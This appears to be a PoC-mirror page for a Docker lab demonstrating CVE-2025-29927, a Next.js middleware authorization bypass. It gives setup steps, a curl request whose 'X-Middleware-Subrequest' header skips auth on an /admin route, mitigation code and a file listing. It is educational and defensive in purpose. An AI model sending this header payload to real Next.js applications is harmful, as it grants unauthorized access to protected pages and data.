CVE-2025-29927 PoC — Authorization Bypass in Next.js Middleware

Source

https://github.com/enochgitgamefied/NextJS-CVE-2025-29927-Docker-Lab

Associated Vulnerability

Title:Authorization Bypass in Next.js Middleware (CVE-2025-29927)
Description:Next.js is a React framework for building full-stack web applications. Starting in version 1.11.4 and prior to versions 12.3.5, 13.5.9, 14.2.25, and 15.2.3, it is possible to bypass authorization checks within a Next.js application, if the authorization check occurs in middleware. If patching to a safe version is infeasible, it is recommend that you prevent external user requests which contain the x-middleware-subrequest header from reaching your Next.js application. This vulnerability is fixed in 12.3.5, 13.5.9, 14.2.25, and 15.2.3.

Readme

```markdown
# 🚨 NextJS-CVE-2025-29927-Docker-Lab

This repository contains a **Docker-based lab** environment to explore and demonstrate the **Next.js CVE-2025-29927** vulnerability in a controlled setting.

> ⚠️ **DISCLAIMER:** This lab is for educational and security research purposes only. Do not expose it to the public internet or use it in production.

---

## 📦 Features

- ✅ Vulnerable Next.js application
- ✅ Containerized with Docker
- ✅ Designed for local testing of CVE-2025-29927
- ✅ Includes pre-configured routes and UI
- ✅ Easy to set up and run

---

## 🛠 Prerequisites

Ensure you have the following installed:

- [Docker](https://www.docker.com/products/docker-desktop) (v20+)
- [Git](https://git-scm.com/downloads)
- Optional: [Node.js](https://nodejs.org/) if you plan to run outside Docker

---

## 🚀 Getting Started

Follow these steps to clone and run the lab:

### 1. Clone the Repository

```bash
git clone https://github.com/enochgitgamefied/NextJS-CVE-2025-29927-Docker-Lab.git
cd NextJS-CVE-2025-29927-Docker-Lab
```

### 2. Build and Run with Docker

```bash
docker-compose up --build
```

This will:

- Build the Docker image
- Start the vulnerable Next.js server
- Expose the app at [http://localhost:3000](http://localhost:3000)

---

## 📂 Folder Structure

```
.
├── app/                     # Main Next.js app code
├── public/                  # Static assets (images, etc.)
├── Dockerfile               # Docker setup for app
├── docker-compose.yml       # Compose configuration
├── .env                     # Environment variables (if any)
├── README.md                # You are here
```

---

## 🧪 Testing the Vulnerability


# 🛡️ CVE-2025-29927 - Next.js Middleware Authorization Bypass

> ⚠️ **WARNING**: This documentation is for **educational and security research purposes** only. Do not deploy the vulnerable app in a production environment.

---

## 🔍 Overview

**CVE-2025-29927** is a critical authorization bypass vulnerability in Next.js middleware. It allows attackers to skip middleware-based authentication and access protected routes by manipulating the `X-Middleware-Subrequest` header. 

---



## 🧪 Reproducing the Vulnerability

### 1. Accessing Protected Routes Without Authentication

Attempt to access a protected route, such as `/admin`, without any authentication:

```bash
curl http://localhost:3000/admin
```

**Expected Behavior**: Access is denied or redirected to an unauthorized page.

**Vulnerable Behavior**: Access is granted without authentication.

### 2. Bypassing Middleware Using `X-Middleware-Subrequest` Header

Send a request with the `X-Middleware-Subrequest` header to bypass middleware checks:

```bash
curl -H "X-Middleware-Subrequest: src/middleware:nowaf" http://localhost:3000/admin
```

**Result**: Middleware is bypassed, and access to the protected route is granted.

---

## 🛡️ Mitigation Strategies

### 1. Upgrade Next.js to a Patched Version

Update Next.js to one of the following versions where the vulnerability is fixed:

* 14.2.25
* 15.2.3

```bash
npm install next@latest
```

### 2. Implement Middleware Hardening

Enhance your middleware to validate requests properly and reject any with suspicious headers:

```javascript
import { NextResponse } from 'next/server';

export function middleware(request) {
  const subrequestHeader = request.headers.get('x-middleware-subrequest');
  if (subrequestHeader) {
    return new NextResponse('Unauthorized', { status: 401 });
  }
  // Continue with normal processing
  return NextResponse.next();
}
```

### 3. Configure Reverse Proxy to Strip Suspicious Headers

If you're using a reverse proxy (e.g., Nginx), configure it to remove the `X-Middleware-Subrequest` header from incoming requests:

```nginx
location / {
  proxy_pass http://localhost:3000;
  proxy_set_header X-Middleware-Subrequest "";
}
```

---

## 📚 References

* [NVD - CVE-2025-29927](https://nvd.nist.gov/vuln/detail/CVE-2025-29927)
* [Datadog Security Labs Analysis](https://securitylabs.datadoghq.com/articles/nextjs-middleware-auth-bypass/)
* [Vercel Postmortem](https://vercel.com/blog/postmortem-on-next-js-middleware-bypass)


This `VULNERABILITY.md` file provides a comprehensive guide to understanding and reproducing the CVE-2025-29927 vulnerability in a controlled environment. It also offers practical mitigation strategies to secure your Next.js applications against such exploits.

For a detailed demonstration and further insights into this vulnerability, you can refer to the full attack demo provided by Techtalkpine on the blog post which also is linked to the Youtube live demo: https://techtalkpine.com/2025/03/demo-for-cve-2025-29927-nextjs/ 

Let me know if you need assistance with any specific part of this setup or further clarification on the mitigation steps. 
```

---

## 🧹 Tear Down

To stop and remove containers:

```bash
docker-compose down
```

---

## 📚 Resources

- [Next.js Docs](https://nextjs.org/docs)
- [Docker Docs](https://docs.docker.com/)
- [OWASP Top 10](https://owasp.org/www-project-top-ten/)

---

## ⚠️ Legal Disclaimer

This project is intended solely for educational and research purposes. You are responsible for using it in accordance with all applicable laws and ethical guidelines. The author is not liable for any misuse or damage caused.

File Snapshot


 [4.0K]  /data/pocs/c893a1666a57a0591be271e2ed7d8cd0d0e2a41e
├── [ 647]  docker-compose.yml
├── [ 465]  Dockerfile
├── [  77]  jsconfig.json
├── [4.0K]  mysql-init
│   ├── [2.9K]  00_init_and_load.sql
│   ├── [ 295]  addresses.csv
│   ├── [  65]  cart.csv
│   ├── [  40]  order_items.csv
│   ├── [ 108]  orders.csv
│   ├── [ 130]  products.csv
│   ├── [  69]  shipping_addresses.csv
│   └── [ 992]  users.csv
├── [ 106]  next.config.js
├── [ 895]  package.json
├── [419K]  package-lock.json
├── [  82]  postcss.config.js
├── [4.0K]  public
│   ├── [ 295]  addresses.csv
│   ├── [  65]  cart.csv
│   ├── [4.0K]  images
│   │   ├── [ 26M]  01.png
│   │   ├── [ 30M]  02.png
│   │   ├── [ 33M]  03.png
│   │   ├── [ 13M]  04.png
│   │   ├── [4.0K]  kids
│   │   │   ├── [ 50K]  kids1.jpg
│   │   │   ├── [ 49K]  kids2.jpg
│   │   │   ├── [ 51K]  kids3.jpg
│   │   │   ├── [ 63K]  kids4.jpg
│   │   │   ├── [ 84K]  kids5.jpg
│   │   │   ├── [ 87K]  kids6.jpg
│   │   │   └── [ 44K]  kids7.jpg
│   │   ├── [4.0K]  men
│   │   │   ├── [ 66K]  men1.jpg
│   │   │   ├── [ 32K]  men2.jpg
│   │   │   ├── [163K]  men3.jpg
│   │   │   ├── [ 59K]  men4.jpg
│   │   │   ├── [122K]  men5.jpg
│   │   │   ├── [ 67K]  men6.jpg
│   │   │   ├── [ 43K]  men7.jpg
│   │   │   └── [ 22K]  men8.jpg
│   │   └── [4.0K]  women
│   │       ├── [ 32K]  women1.jpg
│   │       ├── [ 93K]  women2.jpg
│   │       ├── [ 62K]  women3.jpg
│   │       ├── [110K]  women4.jpg
│   │       ├── [ 20K]  women5.jpg
│   │       ├── [ 26K]  women6.jpg
│   │       ├── [ 59K]  women7.jpg
│   │       └── [ 30K]  women8.jpg
│   ├── [1.3K]  next.svg
│   ├── [  40]  order_items.csv
│   ├── [ 108]  orders.csv
│   ├── [ 130]  products.csv
│   ├── [  69]  shipping_addresses.csv
│   ├── [ 992]  users.csv
│   └── [ 629]  vercel.svg
├── [5.3K]  README.md
├── [4.0K]  src
│   ├── [4.0K]  app
│   │   ├── [4.0K]  account
│   │   │   └── [8.1K]  page.js
│   │   ├── [4.0K]  admin
│   │   │   └── [1.1K]  page.js
│   │   ├── [4.0K]  admin-view
│   │   │   ├── [4.0K]  add-product
│   │   │   │   └── [2.6K]  page.js
│   │   │   ├── [4.0K]  all-products
│   │   │   │   └── [ 302]  page.js
│   │   │   ├── [ 205]  layout.js
│   │   │   └── [6.5K]  page.js
│   │   ├── [4.0K]  api
│   │   │   ├── [4.0K]  address
│   │   │   │   ├── [4.0K]  add-new-address
│   │   │   │   │   └── [2.5K]  route.js
│   │   │   │   ├── [4.0K]  delete-address
│   │   │   │   │   └── [1.2K]  route.js
│   │   │   │   ├── [4.0K]  get-all-address
│   │   │   │   │   └── [2.6K]  route.js
│   │   │   │   └── [4.0K]  update-address
│   │   │   │       └── [1.2K]  route.js
│   │   │   ├── [4.0K]  admin
│   │   │   │   ├── [4.0K]  all-products
│   │   │   │   │   └── [ 763]  route.js
│   │   │   │   ├── [4.0K]  delete-product
│   │   │   │   │   └── [1.2K]  route.js
│   │   │   │   ├── [4.0K]  orders
│   │   │   │   │   ├── [4.0K]  get-all-orders
│   │   │   │   │   │   └── [1.1K]  route.js
│   │   │   │   │   └── [4.0K]  update-order
│   │   │   │   │       └── [1.4K]  route.js
│   │   │   │   ├── [4.0K]  product-by-category
│   │   │   │   │   └── [ 801]  route.js
│   │   │   │   ├── [4.0K]  product-by-id
│   │   │   │   │   └── [ 969]  route.js
│   │   │   │   └── [4.0K]  update-product
│   │   │   │       └── [1.5K]  route.js
│   │   │   ├── [4.0K]  cart
│   │   │   │   ├── [4.0K]  add-to-cart
│   │   │   │   │   └── [1.9K]  route.js
│   │   │   │   ├── [4.0K]  all-cart-items
│   │   │   │   │   └── [1.2K]  route.js
│   │   │   │   └── [4.0K]  delete-from-cart
│   │   │   │       └── [1.2K]  route.js
│   │   │   ├── [4.0K]  login
│   │   │   │   └── [2.2K]  route.js
│   │   │   ├── [4.0K]  order
│   │   │   │   ├── [4.0K]  create-order
│   │   │   │   │   └── [1.1K]  route.js
│   │   │   │   ├── [4.0K]  get-all-orders
│   │   │   │   │   └── [1.1K]  route.js
│   │   │   │   └── [4.0K]  order-details
│   │   │   │       └── [1.2K]  route.js
│   │   │   ├── [4.0K]  register
│   │   │   │   └── [1.8K]  route.js
│   │   │   └── [4.0K]  stripe
│   │   │       └── [1.1K]  route.js
│   │   ├── [4.0K]  cart
│   │   │   └── [2.5K]  page.js
│   │   ├── [4.0K]  checkout
│   │   │   └── [9.9K]  page.js
│   │   ├── [ 25K]  favicon.ico
│   │   ├── [ 652]  globals.css
│   │   ├── [ 595]  layout.js
│   │   ├── [4.0K]  login
│   │   │   └── [5.1K]  page.js
│   │   ├── [1.8K]  middleware.js
│   │   ├── [4.0K]  orders
│   │   │   ├── [4.0K]  [order-details]
│   │   │   │   └── [7.2K]  page.js
│   │   │   └── [4.4K]  page.js
│   │   ├── [7.0K]  page.js
│   │   ├── [4.0K]  product
│   │   │   ├── [4.0K]  [details]
│   │   │   │   └── [ 360]  page.js
│   │   │   └── [4.0K]  listing
│   │   │       ├── [4.0K]  all-products
│   │   │       │   └── [2.9K]  page.js
│   │   │       ├── [4.0K]  kids
│   │   │       │   └── [1.7K]  page.js
│   │   │       ├── [4.0K]  men
│   │   │       │   └── [1.7K]  page.js
│   │   │       └── [4.0K]  women
│   │   │           └── [1.7K]  page.js
│   │   ├── [4.0K]  register
│   │   │   └── [5.2K]  page.js
│   │   └── [4.0K]  unauthorized-page
│   │       └── [1016]  page.js
│   ├── [4.0K]  assets
│   │   ├── [ 26M]  01.png
│   │   ├── [ 25M]  02.png
│   │   ├── [ 33M]  03.png
│   │   └── [ 10M]  04.png
│   ├── [4.0K]  components
│   │   ├── [ 880]  AdminProtector.js
│   │   ├── [4.0K]  CartModal
│   │   │   └── [5.7K]  index.js
│   │   ├── [4.0K]  CommonCart
│   │   │   └── [5.7K]  index.js
│   │   ├── [4.0K]  CommonDetails
│   │   │   └── [5.3K]  index.js
│   │   ├── [4.0K]  CommonListing
│   │   │   ├── [1.0K]  index.js
│   │   │   ├── [4.0K]  ProductButtons
│   │   │   │   └── [3.3K]  index.js
│   │   │   └── [4.0K]  ProductTile
│   │   │       └── [1.5K]  index.js
│   │   ├── [4.0K]  CommonModal
│   │   │   └── [2.2K]  index.js
│   │   ├── [4.0K]  FormElements
│   │   │   ├── [4.0K]  InputComponent
│   │   │   │   └── [ 610]  index.js
│   │   │   ├── [4.0K]  SelectComponent
│   │   │   │   └── [ 940]  index.js
│   │   │   └── [4.0K]  TileComponent
│   │   │       └── [ 930]  index.js
│   │   ├── [4.0K]  Loader
│   │   │   └── [4.0K]  componentlevel
│   │   │       └── [ 362]  index.js
│   │   ├── [4.0K]  Navbar
│   │   │   └── [6.3K]  index.js
│   │   └── [4.0K]  Notification
│   │       └── [ 405]  index.js
│   ├── [4.0K]  context
│   │   └── [3.7K]  index.js
│   ├── [4.0K]  database
│   │   └── [ 942]  index.js
│   ├── [4.0K]  middleware
│   │   └── [ 863]  AuthUser.js
│   ├── [1.9K]  middleware.js
│   ├── [4.0K]  models
│   │   ├── [2.4K]  address.js
│   │   ├── [2.5K]  cart.js
│   │   ├── [3.8K]  order.js
│   │   ├── [2.7K]  product.js
│   │   └── [1.4K]  user.js
│   ├── [4.0K]  services
│   │   ├── [4.0K]  address
│   │   │   └── [1.8K]  index.js
│   │   ├── [4.0K]  cart
│   │   │   └── [1.1K]  index.js
│   │   ├── [4.0K]  login
│   │   │   └── [1.0K]  index.js
│   │   ├── [4.0K]  order
│   │   │   └── [1.8K]  index.js
│   │   ├── [4.0K]  product
│   │   │   └── [2.1K]  index.js
│   │   ├── [4.0K]  register
│   │   │   └── [ 372]  index.js
│   │   └── [4.0K]  stripe
│   │       └── [ 434]  index.js
│   └── [4.0K]  utils
│       ├── [ 313]  cookies.js
│       └── [4.1K]  index.js
├── [ 480]  tailwind.config.js
└── [3.6K]  VULNERABILITY.md

83 directories, 133 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.

View subscription plans →

Goal Reached Thanks to every supporter — we hit 100%!